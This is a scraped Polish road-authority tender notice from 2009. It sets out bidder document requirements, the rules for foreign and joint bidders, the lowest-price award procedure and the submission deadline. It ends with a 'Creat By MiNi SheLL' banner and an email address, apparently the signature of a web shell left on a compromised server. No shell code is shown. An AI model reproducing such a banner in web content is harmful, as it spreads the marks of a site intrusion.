8.1.5.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu. Powyższe zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

8.2.	Na potwierdzenie spełniania warunków opisanych w pkt 7.2. IDW Wykonawcy powinni przedłożyć następujące dokumenty:

8.2.1.	Część sprawozdania finansowego: bilans i rachunek zysków i strat za ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, z oznaczeniem podmiotu na rzecz którego został sporządzony, a jeżeli sprawozdanie finansowe podlega badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię o badanym sprawozdaniu w części dotyczącej bilansu i rachunku zysków i strat. W przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego - inne dokumenty określające obroty oraz zobowiązania i należności za okres jak w zdaniu poprzednim i potwierdzające spełnienie warunku, o którym mowa w pkt 7.2.1. pkt. 1)  IDW.

8.2.2.	Informację banku, lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającą, że wysokość posiadanych środków finansowych lub zdolność kredytowa Wykonawcy jest nie mniejsza od określonej w pkt 7.2.1. pkt. 2) IDW. Powyższe dokumenty muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

8.2.3.	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia na formularzu zgodnym z treścią Formularza 3.2. (,,Potencjał kadrowy,,) i załącznika do tego formularza. Wykaz musi zawierać dane na temat kwalifikacji wskazanych osób, potwierdzające spełnienie warunku, o którym mowa w pkt 7.2.2. IDW. 
W przypadku, gdy wykonawca wskaże w wykazie osoby, którymi będzie dysponował, musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych osób.
8.2.4.	Wykaz narzędzi, urządzeń i środków transportu, którymi dysponuje lub będzie dysponował wykonawca (,,Potencjał techniczny,,) wymaganym(ch) dla realizacji przedmiotu zamówienia, zgodnym z treścią Formularza 3.3. Wykaz musi potwierdzać spełnienie warunku, o którym mowa w pkt 7.2.3. niniejszej Instrukcji dla Wykonawców.
W przypadku, gdy wykonawca wskaże w wykazie narzędzia, urządzenia i środki transportu, którymi będzie dysponował, musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych narzędzi, urządzeń i środków transportu.

8.2.5.	Informację o doświadczeniu Wykonawcy (,,Doświadczenie zawodowe,,), zgodną z treścią Formularza 3.4. Informacja musi potwierdzać spełnienie warunku, o którym mowa w pkt 7.2.4. niniejszej Instrukcji dla Wykonawców. Do informacji powinny być dołączone dokumenty wystawione przez zamawiającego (zamawiających) potwierdzające, że wymienione w informacji roboty zostały wykonane należycie.
8.3.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:
1)	w pkt 8.1.2., 8.1.4. i 8.1.5 - składa dokument lub dokumenty, wystawione w kraju, w którym ma on siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
2)	w pkt 8.1.3 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Pzp.

8.4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 8.3., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

8.5.	Dokumenty, o których mowa w pkt 8.3. i 8.4. powinny być wystawione nie wcześniej niż odpowiadające im dokumenty określone w pkt 8.1.2. - 8.1.5.

8.6.	Dokumenty i oświadczenia wymagane dla potwierdzenia spełnienia przez Wykonawców warunków winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Potwierdzenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątka osoby poświadczającej kopię dokumentu za zgodność z oryginałem). Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę. 

8.7.	W celu potwierdzenia spełnienia warunków wymaganych od Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
a)	oświadczenie wymienione w pkt 8.1.1. powinno być złożone w imieniu wszystkich Wykonawców;
b)	dokumenty wymienione w pkt 8.1.2. - 8.1.5. albo odpowiadające im określone w pkt 8.3. i 8.4., powinny być złożone przez każdego Wykonawcę; 
c)	dokumenty wymienione w pkt 8.2. mogą dotyczyć dowolnego spośród wykonawców składających wspólna ofertę ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gddkia.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad
Oddział w Katowicach - Rejon Wysoki Brzeg
43-600 Jaworzno , ul. Mysłowicka 1
adres do korespondencji :
41-400 Mysłowice , ul. Mysłowicka 1
skr. nr 21.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2009 godzina 09:30, miejsce: Generalna Dyrekcja Dróg Krajowych i Autostrad
Oddział w Katowicach - Rejon Wysoki Brzeg
43-600 Jaworzno , ul. Mysłowicka 1
tel. 32/ 3142410, 32/3142405, fax. wew. 44.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com